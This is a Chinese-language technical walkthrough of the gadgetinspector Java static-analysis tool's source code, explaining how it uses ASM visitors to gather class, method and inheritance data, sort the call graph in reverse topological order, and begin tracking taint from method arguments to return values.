首先进入methodDiscovery当中,可以看到如果不存在,会生成classes.dat、methods .dat、inheritanceMap.dat,分别对类数据、方法数据以及继承关系数据进行收集:
if (!Files.exists(Paths.get("classes.dat")) || !Files.exists(Paths.get("methods.dat"))
|| !Files.exists(Paths.get("inheritanceMap.dat"))) {
LOGGER.info("Running method discovery...");
MethodDiscovery methodDiscovery = new MethodDiscovery();
methodDiscovery.discover(classResourceEnumerator);
//保存了类信息、方法信息、继承实现信息
methodDiscovery.save();
}
跟进MethodDiscovery.discover,传入了上面保存了类信息的classResourceRnumerator,并且调用了getAllClasses方法,获取到了包括rt.jar和指定jar、war包中的所有类,并调用ClassReader的accept方法进行下一步,这里所用到的就是ASM。
public void discover(final ClassResourceEnumerator classResourceEnumerator) throws Exception {
for (ClassResourceEnumerator.ClassResource classResource : classResourceEnumerator.getAllClasses()) {
try (InputStream in = classResource.getInputStream()) {
ClassReader cr = new ClassReader(in);
try {
//使用asm的ClassVisitor、MethodVisitor,利用观察模式去扫描所有的class和method并记录
cr.accept(new MethodDiscoveryClassVisitor(), ClassReader.EXPAND_FRAMES);
} catch (Exception e) {
LOGGER.error("Exception analyzing: " + classResource.getName(), e);
}
} catch (Exception e) {
e.printStackTrace();
}
}
}
ASM及访问者模式
ASM的设计原理基于访问者模式,常用于类的属性无改变,在不侵入类的情况下并对属性的操作做出扩充的场景(类似于AOP)。用生活中的例子我们可以这么理解,想象你是一个导游,要带游客参观一个由多个景点(类、方法、字段等)组成的旅游区(Java类)。访问者模式的工作方式是这样的:
景点清单:旅游区有一份固定的景点清单(类的结构,比如方法、字段,并且这些不会变动)。
游客自由行动:游客(XXXVisitor)可以自由选择在每个景点做什么(比如拍照、记录日志、修改行为)。
导游协调:导游(ASM-ClassReader)负责按顺序带游客访问每个景点,并让游客在每个景点执行自己的操作。
ASM的关键思想:字节码(景点)的结构是固定的,但你可以通过"游客"灵活地定义在每个"景点"做什么,使用时我们需要先通过字节流等方式读入要控制的类,之后传入给ClassReader的accept方法,accept方法会按照JVM规定好的类文件结构来依次调用对应的方法,我们可以通过重写ClassVisitor的各个visit方法,在调用accept时传入,从而实现自己的visitXXX的逻辑。因为ASM是基于责任链的调用,并且支持visiter的嵌套包装来进行遍历调用,调用顺序为从最外层的子visitor开始调用,直到最内层的ClassVisitor,因此需要在我们的visit逻辑中处理下一层的
1. visit() → 访问类的基础信息(版本、类名等)
2. visitSource() → 源码信息(可选)
3. visitModule() → 模块信息(Java 9+,可选)
4. visitNestHost() → 嵌套类宿主(Java 11+,可选)
5. visitPermittedSubtype() → sealed类的许可子类(Java 17+,可选)
6. visitOuterClass() → 外部类信息(如果是内部类)
7. visitAnnotation() → 类上的注解(可能有多个)
8. visitTypeAnnotation() → 类上的类型注解(可能有多个)
9. visitAttribute() → 类的自定义属性(可能有多个)
10. visitField() → 类的字段(按字节码中的顺序访问)
11. visitMethod() → 类的方法(按字节码中的顺序访问)
12. visitEnd() → 类访问结束
我们回到MethodDiscovery.discover,在通过cr.accept后,cr先调用visit方法,因此我们跟进传入cr的MethodDiscoveryClassVisitor的visit方法,MDCV的visit方法保存了当前观察类的信息
this.name:类名
this.superName:继承的父类名
this.interfaces:实现的接口名
this.isInterface:当前类是否接口
this.members:类的字段集合
this.classHandle:gadgetinspector中对于类名的封装,可以通过类名来操作类中相关属性
public void visit ( int version, int access, String name, String signature, String superName, String[]interfaces)
{
this.name = name;
this.superName = superName;
this.interfaces = interfaces;
this.isInterface = (access & Opcodes.ACC_INTERFACE) != 0;
this.members = new ArrayList<>();
this.classHandle = new ClassReference.Handle(name);//类名
annotations = new HashSet<>();
super.visit(version, access, name, signature, superName, interfaces);
}
接下来我们跳过几个不太重要的visit,来到visitField,在cr的控制下,被观察的类有多少个字段,visitField就会被调用多少次,来对字段进行处理。参数列表分别代表属性访问限定符,属性名,属性类型,泛型,属性的初始值(只有静态字段生效)该方法调用时,会先判断该字段是否是静态if ((access & Opcodes.ACC_STATIC) == 0),之后会通过判断字段的类型,如果是Object或者数组类型,就获取其具体内部类型,如果是基本类型,就获取类型的原始描述符。
比如String类型是Object,String[]是Array,那么最后保存的是java/lang/String,Int类型保留原始描述符后为I。获取到类型后将数据保存到visit中初始化好的列表member中。
@Override
public FieldVisitor visitField(int access, String name, String desc,
String signature, Object value) {
if ((access & Opcodes.ACC_STATIC) == 0) {
Type type = Type.getType(desc);
String typeName;
if (type.getSort() == Type.OBJECT || type.getSort() == Type.ARRAY) {
typeName = type.getInternalName();
} else {
typeName = type.getDescriptor();
}
members.add(new ClassReference.Member(name, access, new ClassReference.Handle(typeName)));
}
return super.visitField(access, name, desc, signature, value);
}
可以看到传入的是ClassReference的内部类Member的构造函数,我们跟进ClassReference及Member的结构,可以发现在ClassReference中通过member数组来存储字段信息,内部类Member存储了字段的名字,访问限定修饰符,以及一个Handle类型的type,用来存储属性类型。Handle也是ClassReference中的一个内部类,只有一个字段,用来存储类名。大概访问流程是每个被观测的类对应一个MethodDiscoveryClassVisitor及ClassReference,当ASM观测到一个字段时调用visitField,此时visitField
private final Member[] members; public static class Member {
private final String name;
private final int modifiers;
private final ClassReference.Handle type;
public Member(String name, int modifiers, Handle type) {
this.name = name;
this.modifiers = modifiers;
this.type = type;
} public static class Handle {
private final String name;
public Handle(String name) {
this.name = name;
}
public String getName() {
return name;
}
@Override
public boolean equals(Object o) {
if (this == o) return true;
if (o == null || getClass() != o.getClass()) return false;
Handle handle = (Handle) o;
return name != null ? name.equals(handle.name) : handle.name == null;
}
@Override
public int hashCode() {
return name != null ? name.hashCode() : 0;
}
}
接下来进行 visitMethod,依旧是观察到多少个方法就会调用多少次,初始化一个MethodReference,传入类名,方法名,方法描述(方法的返回值类型以及参数类型,需要使用Type类来进行解析),并且将方法添加到列表discoveredMethods中。
@Override
public MethodVisitor visitMethod(int access, String name, String desc, String signature, String[] exceptions) {
boolean isStatic = (access & Opcodes.ACC_STATIC) != 0;
//找到一个方法,添加到缓存
discoveredMethods.add(new MethodReference(
classHandle,//类名
name,
desc,
isStatic));
return super.visitMethod(access, name, desc, signature, exceptions);
}
最后进入到visitEnd,刚才也说过了会将所有字段整合到一个ClassReference中,并且将整合好的ClassReference添加到discoveredClasses中
@Override
public void visitEnd() {
ClassReference classReference = new ClassReference(
name,
superName,
interfaces,
isInterface,
members.toArray(new ClassReference.Member[members.size()]),
annotations);//把所有找到的字段封装
//找到一个方法遍历完成后,添加类到缓存
discoveredClasses.add(classReference);
super.visitEnd();
}
整个methodDiscovery.discovr执行完成,继续到下一步methodDiscovery.save();中,通过DataLoader.saveData完成。其中对于classes.dat和methods.dat分别通过ClassReference.Factory()和MethodReference.Factory()创建的factory进行序列化存储
public static <T> void saveData(Path filePath, DataFactory<T> factory, Collection<T> values) throws IOException {
try (BufferedWriter writer = Files.newWriter(filePath.toFile(), StandardCharsets.UTF_8)) {
for (T value : values) {
final String[] fields = factory.serialize(value);
if (fields == null) {
continue;
}
StringBuilder sb = new StringBuilder();
for (String field : fields) {
if (field == null) {
sb.append("\t");
} else {
sb.append("\t").append(field);
}
}
writer.write(sb.substring(1));
writer.write("\n");
}
}
最终形成的文件格式如下:
classes.dat:
类名(例:java/lang/String) 父类 接口A,接口B,接口C 是否接口 字段1!字段1access!字段1类型!字段2!字段2access!字段1类型
methods.dat:
类名 方法名 方法描述 是否静态方法
在持久化相关数据后,会通过Map来整合ClassReference.Handle和ClassReference之间的映射关系
Map<ClassReference.Handle, ClassReference> classMap = new HashMap<>();
for (ClassReference clazz : discoveredClasses) {
classMap.put(clazz.getHandle(), clazz);
}
接下来进行类的继承以及实现关系的整合分析
InheritanceDeriver.derive(classMap).save();
跟进到InheritanceDeriver.derive中,可以看到做的事就是利用Map来保存继承关系,形成了类- >(父类,接口,超类)的映射关系。
public static InheritanceMap derive(Map<ClassReference.Handle, ClassReference> classMap) {
LOGGER.debug("Calculating inheritance for " + (classMap.size()) + " classes...");
Map<ClassReference.Handle, Set<ClassReference.Handle>> implicitInheritance = new HashMap<>();
//遍历所有类
for (ClassReference classReference : classMap.values()) {
if (implicitInheritance.containsKey(classReference.getHandle())) {
throw new IllegalStateException("Already derived implicit classes for " + classReference.getName());
}
Set<ClassReference.Handle> allParents = new HashSet<>();
//获取classReference的所有父类、超类、接口类
getAllParents(classReference, classMap, allParents);
//添加缓存:类名 -> 所有的父类、超类、接口类
implicitInheritance.put(classReference.getHandle(), allParents);
}
//InheritanceMap翻转集合,转换为{class:[subclass]}
return new InheritanceMap(implicitInheritance);
}
getAllParents方法会递归的将当前观察类的所有父类、接口的父类查找出来,并且添加到allParents集合中
private static void getAllParents(ClassReference classReference, Map<ClassReference.Handle, ClassReference> classMap, Set<ClassReference.Handle> allParents) {
Set<ClassReference.Handle> parents = new HashSet<>();
//把当前classReference类的父类添加到parents
if (classReference.getSuperClass() != null) {
parents.add(new ClassReference.Handle(classReference.getSuperClass()));
}
//把当前classReference类实现的所有接口添加到parents
for (String iface : classReference.getInterfaces()) {
parents.add(new ClassReference.Handle(iface));
}
for (ClassReference.Handle immediateParent : parents) {
//从所有类数据集合中,遍历找出classReference的父类、接口
ClassReference parentClassReference = classMap.get(immediateParent);
if (parentClassReference == null) {
LOGGER.debug("No class id for " + immediateParent.getName());
continue;
}
//继续添加到集合中
allParents.add(parentClassReference.getHandle());
//继续递归查找,直到把classReference类的所有父类、超类、接口类都添加到allParents
getAllParents(parentClassReference, classMap, allParents);
}
}
最后将类名与整合好的allParents形成映射关系,存储到implicitInheritance中:
implicitInheritance.put(classReference.getHandle(), allParents);
接下来会用InheritanceMap构造函数将implicitInheritance的子->父的映射关系进行逆转整合。
private final Map<ClassReference.Handle, Set<ClassReference.Handle>> inheritanceMap;
//父-子关系集合
private final Map<ClassReference.Handle, Set<ClassReference.Handle>> subClassMap;
public InheritanceMap(Map<ClassReference.Handle, Set<ClassReference.Handle>> inheritanceMap) {
this.inheritanceMap = inheritanceMap;
subClassMap = new HashMap<>();
for (Map.Entry<ClassReference.Handle, Set<ClassReference.Handle>> entry : inheritanceMap.entrySet()) {
ClassReference.Handle child = entry.getKey();
for (ClassReference.Handle parent : entry.getValue()) {
subClassMap.computeIfAbsent(parent, k -> new HashSet<>()).add(child);
}
}
}
其中这一行代码会判断inheritanceMap中每个子类对应的set中的value(parent),是否在subClassMap中,如果不存在执行Lambda表达式,创建一个新的空HashSet,将parent作为key,HashSet作为value存入subClassMap,并且将child添加到HashSet中。最终subClassMap就变成了父类->子类的映射关系。
subClassMap.computeIfAbsent(parent, k -> new HashSet<>()).add(child);
举个例子:
假设 inheritanceMap 包含:
"Dog" → {"Animal", "Object"}
"Cat" → {"Animal", "Object"}
则 subClassMap 的构建过程如下:
处理 Dog 的父类 Animal:
subClassMap 中没有 Animal,创建HashSet → Animal: {Dog}
处理 Dog 的父类 Object:
没有 Object,创建HashSet → Object: {Dog}
处理 Cat 的父类 Animal:
Animal 已存在,直接添加 → Animal: {Dog, Cat}
处理 Cat 的父类 Object:
Object 已存在,添加 → Object: {Dog, Cat}
最终 subClassMap 结果:
"Animal" → {"Dog", "Cat"}
"Object" → {"Dog", "Cat"}
最后调用save方法对继承关系进行保存,方法依旧和上面一样,会进行序列化后持久化存储:
public void save() throws IOException {
//inheritanceMap.dat数据格式:
//类名 父类或超类或接口类1 父类或超类或接口类2 父类或超类或接口类3 ...
DataLoader.saveData(Paths.get("inheritanceMap.dat"), new InheritanceMapFactory(), inheritanceMap.entrySet());
}
最终形成的inheritanceMap.dat结构如下:
类名 父类或超类或接口类1 父类或超类或接口类2 父类或超类或接口类3 ...
0x04 入参返回值污染关系收集-PassthroughDiscovery
这一步类似于污点分析,我们对各个方法的参数对返回值的污染关系做出总结:
if (!Files.exists(Paths.get("passthrough.dat")) && ConfigHelper.taintTrack) {
LOGGER.info("Analyzing methods for passthrough dataflow...");
PassthroughDiscovery passthroughDiscovery = new PassthroughDiscovery();
//记录参数在方法调用链中的流动关联(如:A、B、C、D四个方法,调用链为A->B B->C C->D,其中参数随着调用关系从A流向B,在B调用C过程中作为入参并随着方法结束返回,最后流向D)
//该方法主要是追踪上面所说的"B调用C过程中作为入参并随着方法结束返回",入参和返回值之间的关联
passthroughDiscovery.discover(classResourceEnumerator, config);
passthroughDiscovery.save();
}
跟进passthroughDiscovery.discover当中,首先会将我们上一步MethodDiscovery所生成的类、方法、继承信息读取进来
public void discover(final ClassResourceEnumerator classResourceEnumerator, final GIConfig config) throws IOException {
//加载文件记录的所有方法信息
Map<MethodReference.Handle, MethodReference> methodMap = DataLoader.loadMethods();
//加载文件记录的所有类信息
Map<ClassReference.Handle, ClassReference> classMap = DataLoader.loadClasses();
//加载文件记录的所有类继承、实现关联信息
InheritanceMap inheritanceMap = InheritanceMap.load();
接下来通过discoverMethodCalls,来找出所有方法间的调用关系,我们继续跟进
//搜索方法间的调用关系,缓存至methodCalls集合,返回 类名->类资源 映射集合
Map<String, ClassResourceEnumerator.ClassResource> classResourceByName = discoverMethodCalls(classResourceEnumerator);
在该方法中,依然是通过ASM来先对所有的类进行一次观察,用到的visitor是MethodCallDiscoveryClassVisitor,并且这里的MethodCallDiscoveryClassVisitor内部是做了一些包装的,这一部分的执行顺序可能会有点乱,我会在方法分析结束后总结一下:
private Map<String, ClassResourceEnumerator.ClassResource> discoverMethodCalls(final ClassResourceEnumerator classResourceEnumerator) throws IOException {
Map<String, ClassResourceEnumerator.ClassResource> classResourcesByName = new HashMap<>();
for (ClassResourceEnumerator.ClassResource classResource : classResourceEnumerator.getAllClasses()) {
try (InputStream in = classResource.getInputStream()) {
ClassReader cr = new ClassReader(in);
try {
MethodCallDiscoveryClassVisitor visitor = new MethodCallDiscoveryClassVisitor(Opcodes.ASM6);
cr.accept(visitor, ClassReader.EXPAND_FRAMES);
classResourcesByName.put(visitor.getName(), classResource);
} catch (Exception e) {
LOGGER.error("Error analyzing: " + classResource.getName(), e);
}
}
}
return classResourcesByName;
}
分别跟进MCDCV的visit以及visitMethod方法,visit方法中将传入进来的classname进行记录
@Override public void visit(int version, int access, String name, String signature, String superName, String[] interfaces) { super.visit(version, access, name, signature, superName, interfaces); if (this.name != null) { throw new IllegalStateException("ClassVisitor already visited a class!"); } thi
visitMethod方法又创建了一个MethodCallDiscoveryMethodVisitor,并且可以看到在实例化时将上面的mv也传了进去。但其实我们观察MethodCallDiscoveryClassVisitor的构造函数,在调用父类构造函数时并没有传入任何的classvisitor,因此父类ClassVisitor的cv属性为null,最终返回的也是个null,在这里传入给MCDMV的mv也是个null:
@Override
public MethodVisitor visitMethod(int access, String name, String desc,
String signature, String[] exceptions) {
MethodVisitor mv = super.visitMethod(access, name, desc, signature, exceptions);
//在visit每个method的时候,创建MethodVisitor对method进行观察
MethodCallDiscoveryMethodVisitor modelGeneratorMethodVisitor = new MethodCallDiscoveryMethodVisitor(
api, mv, this.name, name, desc);
return new JSRInlinerAdapter(modelGeneratorMethodVisitor, access, name, desc, signature, exceptions);
} // MethodCallDiscoveryClassVisitor的构造函数
MethodCallDiscoveryClassVisitor visitor = new MethodCallDiscoveryClassVisitor(Opcodes.ASM6);
//父类ClassVisitor的构造函数
public ClassVisitor(final int api) {
this(api, null);
}
public ClassVisitor(final int api, final ClassVisitor classVisitor) {
if (api != Opcodes.ASM6
&& api != Opcodes.ASM5
&& api != Opcodes.ASM4
&& api != Opcodes.ASM7_EXPERIMENTAL) {
throw new IllegalArgumentException();
}
this.api = api;
this.cv = classVisitor;
}
//父类ClassVisitor的visitMethod方法
public MethodVisitor visitMethod(
final int access,
final String name,
final String descriptor,
final String signature,
final String[] exceptions) {
if (cv != null) {
return cv.visitMethod(access, name, descriptor, signature, exceptions);
}
return null;
}
跟进MethodCallDiscoveryMethodVisitor,可以发现父类为MethodVisitor,并且调用父类的构造函数时传入了mv,但其实我们这里静态分析可以分析出来mv是null的,即便传入了在调用MethodVisitor.visitXXX时,最终也不会走到cv.visitXXX上,我这里推测是作者为了工具的扩充性,如果我们需要添加其他的visitor来对方法进行其他处理,那么就可以形成我们之前提到的类似于责任链的方式,来遍历的调用visitXXX:
public MethodCallDiscoveryMethodVisitor(final int api, final MethodVisitor mv,
final String owner, String name, String desc) {
super(api, mv);
我们继续看,可以看到接下来会将传入的owner(此时正在观察的类名)封装到ClassReference.Handle中,并再将这个CRF.Handle和方法名、方法的相关描述封装到一个MethodReference.Handle中,calledMethods是每次观察到一个方法,都会创建的空HashSet,最终形成了观察方法:{被观察方法调用方法}的映射关系存入到methodCalls中:
// private final Map<MethodReference.Handle, Set<MethodReference.Handle>> methodCalls = new HashMap<>();
this.calledMethods = new HashSet<>();
methodCalls.put(new MethodReference.Handle(new ClassReference.Handle(owner), name, desc), calledMethods);
}
继续向下看,类中还有一个visitMethodInsn方法,当检测到方法内部的调用时就会执行(底层原理是检查到字节码指令INVOKEVIRTUAL、INVOKESPECIAL、INVOKESTATIC、INVOKEINTERFACE),从而将正在观察的方法中调用的方法加入到calledMethods中
@Override
public void visitMethodInsn(int opcode, String owner, String name, String desc, boolean itf) {
calledMethods.add(new MethodReference.Handle(new ClassReference.Handle(owner), name, desc));
super.visitMethodInsn(opcode, owner, name, desc, itf);
}指令调用类型适用方法特点INVOKEVIRTUAL虚方法调用(动态绑定)普通实例方法(非私有、非构造器、非静态)运行时根据对象实际类型选择方法,支持多态INVOKESPECIAL特殊方法调用(静态绑定)构造器、私有方法、super.xxx()编译时就决定调用哪一个,不支持多态INVOKESTATIC静态方法调用static 修饰的方法无需对象即可调用,直接通过类名调用INVOKEINTERFACE接口方法调用接口定义的方法运行时通过接口表定位目标方法,支持多态
回到visitMethod中,最后会进行return操作,并且return的是JSRInlinerAdapter。为什么要return这个类呢,因为在早期的java版本中,使用JSR和RET跳转指令来进行程序流程控制,在后续版本已废弃并使用GOTO指令,因此需要进行兼容处理。JSRInlinerAdapter会将JSR和RET指令转为GOTO指令,从而兼容了早期项目。
return new JSRInlinerAdapter(modelGeneratorMethodVisitor, access, name, desc, signature, exceptions);
经过这些封装,调用cr.accept(visitor, ClassReader.EXPAND_FRAMES);将封装好的MethodCallDiscoveryClassVisitor传入进行方法调用关系收集。accept执行顺序如下:
MethodCallDiscoveryClassVisitor.visit对类进行观察
当观察到方法时调用MethodCallDiscoveryClassVisitor.visitMethod,其中会创建一个MethodCallDiscoveryMethodVisitor实例,并包装为JSRInlinerAdapter返回,创建实例时会自动为观察到的方法添加一个映射关系,即当前观察方法->calledMethods
当触发了visitxxx时,会先把这些visitxxx发给JSRInlinerAdapter,JSRInlinerAdapter通过各个visit方法对JSR和RET跳转指令进行转换。
JSRInlinerAdapter 本身也是一个 MethodVisitor,它的回调时机完全跟 ASM 的方法遍历流程一致,只不过它在内部额外“钩”了两个地方来做子例程(JSR/RET)内联:
visitJumpInsn每当 ASM 在浏览方法字节码时碰到一个跳转指令(visitJumpInsn(int opcode, Label lbl)),就会调用到它的这个方法。
如果 opcode == JSR,它就把这个子例程入口标签记下来,标记说“后面要做内联”
visitEnd当 ASM 遍历完一个方法的所有指令并调用到 visitEnd() 时,JSRInlinerAdapter 会先检查在 visitJumpInsn 里有没有记录过任何 JSR。
如果有,就走 markSubroutines() → emitCode() 的流程,把所有老版本的 JSR/RET 全部展开成 GOTO(以及必要的空值占位等)
然后再把重写后的指令列表一次性转发给它下游的 MethodVisitor(通常是一个 MethodWriter)https://code.yawk.at/org.ow2.asm/asm-analysis/5.2/org/objectweb/asm/commons/JSRInlinerAdapter.java
换句话说:
只要你把 JSRInlinerAdapter 插到你的 MethodVisitor 链上(手动 new 一个 或者在使用 ClassWriter.COMPUTE_FRAMES/ClassReader.EXPAND_FRAMES 时 ASM 自动给你插入),
在方法遍历时遇到跳转就会进 visitJumpInsn,
在方法结束时(visitEnd)就会真正触发“内联 JSR→GOTO” 的逻辑。
这样保证了旧版子例程指令在生成新的字节码之前就被全部消除,适配现代 JVM 对 StackMapFrame 的要求。
4.JSRInlinerAdapter将指令转换并内联后,会通过其visitend方法再次通过accept将visitXXX传递给下一个visitor,也就是传入的MethodCallDiscoveryMethodVisitor的visitMethodInsn方法,从而将被调用的方法添加到当前观察方法的calledMethods中。
accept方法结束后还剩一行,还是将类名和classResource的映射关系存储起来并return:
classResourcesByName.put(visitor.getName(), classResource);
discoverMethodCalls逻辑结束后,接下来是对methodCalls进行一次逆拓扑排序,所谓逆拓扑排序就是把拓扑排序的序列倒过来,什么你还不知道什么是拓扑排序?或许你该学一下数据结构了,或者看一下这篇文章介绍的吧
https://paper.seebug.org/1034/List<MethodReference.Handle> sortedMethods = topologicallySortMethodCalls();
为什么我们要进行逆拓扑排序,因为在方法的调用链上,假设a方法传递参数给b方法,并且b方法的返回值影响到了a方法的返回值,那么我们在判断方法链的时候就不能从a方法来入手,需要从最深处被调用的b方法来入手,观察b方法的参数与返回值之间是否存在关系,如果存在关系则证明了a方法传入b方法的参数与b方法返回值有关,此时b方法返回值影响到了a方法返回值,那么我们也就可以断定ab方法之间存在污染关系。
在方法调用的关系中,我们可以将这些调用抽象为有向图,假设a方法内部调用了b方法,那么我们就可以将a方法对应的图节点引出一条有向边,指向b方法。最终将所有的调用关系全部依次类推,就形成了一个有向图。我们将指向其他节点的边的数量叫做一个点的出度,指向自己的边的数量叫做一个节点的入度,如果找到有向图中一个入度为0的节点,将其节点以及所有的边全部消去,并输出该节点。不断重复这一操作,直到图中所有节点和边全部被消除掉,我们就得到了一组拓扑排序序列,而这一个序列就对应了我们的方法调用顺序。
但事情并没有想象中这么顺利,在方法调用中会出现两种情况,一个是相同的方法可能会存在重复调用,并且方法调用中由于回调等方式的存在,造成图中可能会出现环路,而环路的出现会导致拓扑排序在某一时刻无法找到一个入度为0的点,也就没有拓扑序列的产生了,解决办法上面的文章也提到了。我们用一个例子来看一下具体的执行过程:
假设有以下方法调用关系:
A → B → CA → D
对应的调用图为:
outgoingReferences = { A: {B, D}, B: {C}, C: {}, D: {}}
初始调用:从根节点 A 开始。
dfsTsort(outgoingReferences, sortedMethods, visitedNodes, stack, A);
处理节点 A:
stack 为空,visitedNodes 为空 → 继续。
获取 A 的被调用方法集合 {B, D}。
将 A 加入 stack(当前路径:[A])。
递归处理子节点 B:
dfsTsort(outgoingReferences, sortedMethods, visitedNodes, stack, B);
处理节点 B:
stack 包含 A,不包含 B → 继续。
获取 B 的被调用方法集合 {C}。
将 B 加入 stack(当前路径:[A, B])。
递归处理子节点 C:
dfsTsort(outgoingReferences, sortedMethods, visitedNodes, stack, C);
处理节点 C:
stack 包含 A, B,不包含 C → 继续。
获取 C 的被调用方法集合 {}(无子节点)。
将 C 加入 visitedNodes 和 sortedMethods:
visitedNodes = {C}, sortedMethods = [C]
返回处理 B。
回溯节点 B:
从 stack 中移除 B(当前路径:[A])。
将 B 加入 visitedNodes 和 sortedMethods:
visitedNodes = {C, B}, sortedMethods = [C, B]
处理 B 的下一个子节点(无剩余节点),返回处理 A。
处理节点 A 的第二个子节点 D:
将 D 加入 stack(当前路径:[A, D])。
递归处理 D:
dfsTsort(outgoingReferences, sortedMethods, visitedNodes, stack, D);
处理节点 D:
获取 D 的被调用方法集合 {}(无子节点)。
将 D 加入 visitedNodes 和 sortedMethods:
visitedNodes = {C, B, D}, sortedMethods = [C, B, D]
返回处理 A。
回溯节点 A:
从 stack 中移除 A(当前路径:[])。
将 A 加入 visitedNodes 和 sortedMethods:
visitedNodes = {C, B, D, A}, sortedMethods = [C, B, D, A]
污点分析顺序:
先分析 C(无依赖),确定其污点传播规则。
分析 B(依赖 C),利用 C 的结果。
分析 D(无依赖)。
最后分析 A(依赖 B 和 D),确保所有被调用方法已处理。
若存在循环调用(如 A → B → A):
处理 A → B → A 时,第二次进入 A 的递归:
stack 包含 A → 触发 if (stack.contains(node)) return;
终止递归,避免死循环。
逆拓扑排序后,接下来就是对方法参数和返回值之间污染关系的分析:
passthroughDataflow = calculatePassthroughDataflow(classResourceByName, classMap, inheritanceMap, sortedMethods, config.getSerializableDecider(methodMap, inheritanceMap));
跟进calculatePassthroughDataflow,首先会遍历sortedMethods,如果是静态初始化代码,即静态代码块,就直接跳过,因为静态代码块是在类加载的时候就加载到JVM当中,我们一般没有办法在程序运行中进行控制
final Map<MethodReference.Handle, Set<Integer>> passthroughDataflow = new HashMap<>(); //遍历所有方法,然后asm观察所属类,经过前面DFS的排序,调用链最末端的方法在最前面 for (MethodReference.Handle method : sortedMethods) { //跳过static静态初始化代码 if (method.getName().equals("<clinit>")) { continue; }
接下来就是对当前所遍历的方法的所属类进行ASM观察:
ClassResourceEnumerator.ClassResource classResource = classResourceByName.get(method.getClassReference().getName()); try (InputStream inputStream = classResource.getInputStream()) { ClassReader cr = new ClassReader(inputStream); try { PassthroughDataflowClassVisitor cv = new PassthroughDataflowClas
跟进visitor逻辑,查看visit方法,visit方法会判断当前观察的类是否是要准备观察方法的所属类
@Override public void visit(int version, int access, String name, String signature, String superName, String[] interfaces) { super.visit(version, access, name, signature, superName, interfaces); this.name = name; //不是目标观察的class跳过 if (!this.name.equals(methodToVisit.getClassReference().getName())) {
接着看visitMethod,我们需要观察的类中的方法只需要是sortedMethod中的方法即可,也就是传入进来的methodToVisit,其他方法是不存在调用关系的:
//不是目标观察的method需要跳过,上一步得到的method都是有调用关系的method才需要数据流分析 if (!name.equals(methodToVisit.getName()) || !desc.equals(methodToVisit.getDesc())) { return null; }
接下来是对方法进行更细致的观察,依旧看封装后的PassthroughDataflowMethodVisitor
MethodVisitor mv = super.visitMethod(access, name, desc, signature, exceptions); passthroughDataflowMethodVisitor = new PassthroughDataflowMethodVisitor( classMap, inheritanceMap, this.passthroughDataflow, serializableDecider, api, mv, this.name, access, name, desc, signature, exceptions);
下面作者用代码模拟了方法调用的过程,从而在模拟的局部变量表(污点变量表)中对参数进行污点标记。我们先来回顾JVM在进行方法调用时都做了哪些事情。假设现在A方法中要调用B方法,那么此时我们是在A方法内部的,那么JVM中会有A方法的栈帧,栈帧中主要两部分,一个是局部变量表,一个是操作数栈,当A方法内部准备调用B方法时,会先将要传给B方法的参数保存到A方法栈帧的操作数栈上,此时JVM会为B方法创建其对应的栈帧,然后在A方法操作数栈上的参数会被弹到B方法栈帧的局部变量表中。B方法内部使用这些参数时,会通过LOAD指令将其从局部变量表加载到操作数栈上,再进行使用。这里的思想就是用代码去模仿JVM的行为,
下面的分析过程基于如下例子,这一段代码调用包含了入参与返回结果相同,返回结果与入参有关的情况,我们分别来看:
public class Main { public String main(String args) throws IOException { String cmd = new A().method1(args); return new B().method2(cmd); }}class A { public String method1(String param) { return param; }}class B { public String method2(String param) { return new C().method3(param); }}class C { publi
逆拓扑排序后的结果为:
A.method1
C.method3
B.method2
main
A.method1
因此我们先从A.method1来进行分析:
这里我们看到visitCode方法,在进入方法的第一时间,ASM会先调用这个方法。对于非静态方法来说,方法参数插槽的第一个0号位位this,对于静态方法,0号位为参数,所以这里将方法内的所有参数保存在一个使用Java代码模拟的局部变量表中,localIndex为参数在局部变量表中的位置,由于参数的类型不同,所以其在局部变量表中占用的大小也不同。而argIndex对应了参数在方法中的索引,通过setLocalTaint方法,形成了局部变量表与方法参数索引之间的映射关系
@Override
public void visitCode() {
super.visitCode();
int localIndex = 0;
int argIndex = 0;
if ((this.access & Opcodes.ACC_STATIC) == 0) {
//非静态方法,第一个局部变量应该为对象实例this
//添加到局部变量表集合
setLocalTaint(localIndex, argIndex);
localIndex += 1;
argIndex += 1;
}
for (Type argType : Type.getArgumentTypes(desc)) {
//判断参数类型,得出变量占用空间大小,然后存储
setLocalTaint(localIndex, argIndex);
localIndex += argType.getSize();
argIndex += 1;
}
}
protected void setLocalTaint(int index, T ... possibleValues) {
Set<T> values = new HashSet<T>();
for (T value : possibleValues) {
values.add(value);
}
savedVariableState.localVars.set(index, values);
}
接下来执行A.method1方法内部逻辑时(即return param),要将局部变量表中的参数通过ALOAD指令读取到操作数栈上,继续模拟,在检测到ALOAD指令时(包括其他访问局部变量表的指令),会回调visitVarInsn,将参数push到模拟的污点栈上,这里的参数可以看到是列表localVars的值,也就是局部变量表中对应的参数索引
@Override
public void visitVarInsn(int opcode, int var) {
// Extend local variable state to make sure we include the variable index
for (int i = savedVariableState.localVars.size(); i <= var; i++) {
savedVariableState.localVars.add(new HashSet<T>());
}
//变量操作,var为操作的本地变量索引
Set<T> saved0;
switch(opcode) {
case Opcodes.ILOAD:
case Opcodes.FLOAD:
push();
break;
case Opcodes.LLOAD:
case Opcodes.DLOAD:
push();
push();
break;
case Opcodes.ALOAD:
//从局部变量表取出变量数据入操作数栈,这个变量数据可能是被污染的
push(savedVariableState.localVars.get(var));
break;
case Opcodes.ISTORE:
case Opcodes.FSTORE:
pop();
savedVariableState.localVars.set(var, new HashSet<T>());
break;
case Opcodes.DSTORE:
case Opcodes.LSTORE:
pop();
pop();
savedVariableState.localVars.set(var, new HashSet<T>());
break;
case Opcodes.ASTORE:
//从栈中取出数据存到局部变量表,这个数据可能是被污染的(主要还是得看调用的方法,返回值是否可被污染)
saved0 = pop();
savedVariableState.localVars.set(var, saved0);
break;
case Opcodes.RET:
// No effect on stack
break;
default:
throw new IllegalStateException("Unsupported opcode: " + opcode);
}
super.visitVarInsn(opcode, var);
sanityCheck();
}
private void push(Set<T> possibleValues) {
// Intentionally make this a reference to the same set
savedVariableState.stackVars.add(possibleValues);
}
接下来当方法调用结束return时,由于使用了ARETURN指令,在解析到无操作数的简单指令时触发visitInsn,我们查看其具体逻辑,可以发现在方法return时,将当前栈上的值返回,即返回的是参数索引set,并将存储到了returnTaint中,代表了A.method1这个方法的调用,参数索引为1的参数param会污染返回值:
